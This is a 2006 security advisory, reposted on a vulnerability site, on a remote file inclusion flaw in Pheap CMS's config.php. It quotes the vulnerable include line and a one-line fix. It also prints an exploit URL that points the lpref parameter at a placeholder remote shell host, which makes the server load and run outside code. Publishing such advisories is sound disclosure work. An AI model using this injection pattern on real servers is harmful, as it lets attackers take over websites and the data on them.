Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA21706] Cerberus Helpdesk "ticket" Parameter Arbitrary Ticket Access

  [SA21690] Webmin / Usermin Cross-Site Scripting and Source Code Disclosure

  ModuleBased CMS alfa 1 Multiple Remote File Inclusion

  Membrepass v1.5 Php code execution, Xss, Sql Injection

From:SHiKaA-_(at)_hotmail.com <SHiKaA-_(at)_hotmail.com>
Date:01.09.2006
Subject:Pheap CMS<= (lpref) Remote File Inclusion Exploit

#================================================================================
==============
#Pheap CMS<= (lpref) Remote File Inclusion Exploit
#================================================================================
===============
#                                                                           
#Critical Level : Dangerous                                                 
#                                                                           
#Venedor site : http://pheap.barekoncept.com/           
#                                                                                  
                                           
#                                                              
#================================================================================
================
#Bug in : pheap/lib/config.php
#
#Vlu Code :
#--------------------------------
#     <?
#
#      include($lpref."lib/globals.php");
#
#================================================================================
================
#
#Solution :
#        
# Insert in config.php    $lpref = "pheap";
# soory guys ... u willn't find any variable sites coz the scripts very new ;)
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/pheap/lib/config.php?lpref=http://SHELLURL.COM?
#
#================================================================================
================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
=================================================================================
=================

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru